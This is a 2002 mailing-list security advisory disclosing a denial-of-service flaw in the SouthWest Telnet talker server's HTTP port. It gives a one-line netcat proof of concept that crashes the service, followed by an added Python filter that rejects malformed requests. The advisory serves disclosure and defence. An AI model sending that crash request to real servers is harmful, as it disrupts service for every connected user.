SouthWest Telnet talker server. DoS (Denial of Service Attack).

From: Alex Hernandez (alex_hernandez@ureach.com)
Date: 03/26/02


Date: Mon, 25 Mar 2002 20:59:20 -0500
To: bugtraq@securityfocus.com
From: Alex Hernandez <alex_hernandez@ureach.com>


------oOo------
SouthWest free Telnet talker server. DoS (Denial of Service
Attack).
------oOo------

Company Affected: Scott Lloyd
Version: v1.0.0
Size: 2.74 MB
OS Affected: Windows ALL.

Author:

** Alex Hernandez <alex_hernandez@ureach.com>
** Thanks to all the people from Spain and Argentina.
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.

----=[Brief Description]=------------
 
SouthWest is a free Telnet talker server for Windows. It includes
full ANSI color support, a help system, an intuitive interface, and
speed optimizations. Free, full source code is available at the
company's Web site.

----=[Summary]=----------------------

The server is very similar to IRC. By default it opens the
following ports:

*Main socket initialized and listening on port 5000.
*Netlink socket initialized and listening on port 5001.
*HTTP server initialized and listening on port 5002.

The bug is in the HTTP server on port 5002: a request sent by a
remote user via HTTP crashes the system for every connected user.

------oOo------
Proof of concept

Example:

DoS

$ printf "GET /&Alex" |nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?) open
sent 10, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5002
(UNKNOWN) [127.0.0.1] 5002 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5000
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

$ nc -vvn 127.0.0.1 5001
(UNKNOWN) [127.0.0.1] 5000 (?): connection refused
sent 0, rcvd 0: NOTSOCK

The system crashes and the admin needs to restart the service!

You can see this on screen:

[...]
Room: Hallway

You are in the hallway. The large front door leads out to the
drive whilst
another smaller door leads into the wizards room. A corridor
leads deeper
into the mansion.

Exits are: Drive Wizroom Corridor
Netlinks are: Cyber City

You are all alone here

Access is fixed to PUBLIC and there are 0 messages on the board.
Current topic: Topic has not been set
You say: Hello!
You say: Friends
You say: crash the system .....

Connection to host lost.

[...]

C:\>

------oOo------------------------------------
Vendor Response:
The vendor was notified
southwest@talker.com
http://someplaceelse.dynip.com/southwest/
Temporary patch: No data from vendor.

Alex Hernandez <alex_hernandez@ureach.com> (c) 2002.

------oOo------------------------------------
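
Added example, not part of the original advisory or of the SouthWest source: the request in the proof of concept above ("GET /&Alex") is not well-formed HTTP, since it has no HTTP version and no CRLF CRLF terminator. A front end placed before the port 5002 listener could reject such requests with a structural check like the one below. The advisory does not say which property of the request triggers the crash, so this only filters malformed requests; the function name, the size limit and all samples except the first are assumptions made for illustration.

```python
import re
from typing import Tuple

# Strict request-line shape: METHOD SP origin-form target SP HTTP/1.x
REQUEST_LINE = re.compile(rb"(GET|HEAD) (/[\x21-\x7e]*) HTTP/1\.[01]")
HEADER_NAME = re.compile(rb"[A-Za-z0-9-]+")
MAX_REQUEST_BYTES = 4096  # assumed limit, not taken from the advisory


def check_request(raw: bytes) -> Tuple[bool, str]:
    """Return (ok, reason) for the bytes read from one client connection."""
    if len(raw) > MAX_REQUEST_BYTES:
        return False, "request too large"
    # A complete request ends its header block with an empty line.
    head, sep, _ = raw.partition(b"\r\n\r\n")
    if not sep:
        return False, "header block not terminated by CRLF CRLF"
    lines = head.split(b"\r\n")
    # fullmatch rejects stray bytes (bare LF, extra spaces) around the line.
    if not REQUEST_LINE.fullmatch(lines[0]):
        return False, "malformed request line"
    for line in lines[1:]:
        name, colon, _ = line.partition(b":")
        if not colon or not HEADER_NAME.fullmatch(name):
            return False, "malformed header field"
    return True, "ok"


# The first sample is the request from the proof of concept; the rest are
# constructed for this example.
SAMPLES = [
    b"GET /&Alex",
    b"GET /\r\n\r\n",
    b"GET /&Alex HTTP/1.0\r\n\r\n",
    b"GET / HTTP/1.0\r\nHost: 127.0.0.1\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        ok, reason = check_request(sample)
        print("%-45r %s (%s)" % (sample, "pass" if ok else "reject", reason))
```

The third sample passes because it is structurally valid; if the path itself turns out to be the trigger, this filter alone does not stop it.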
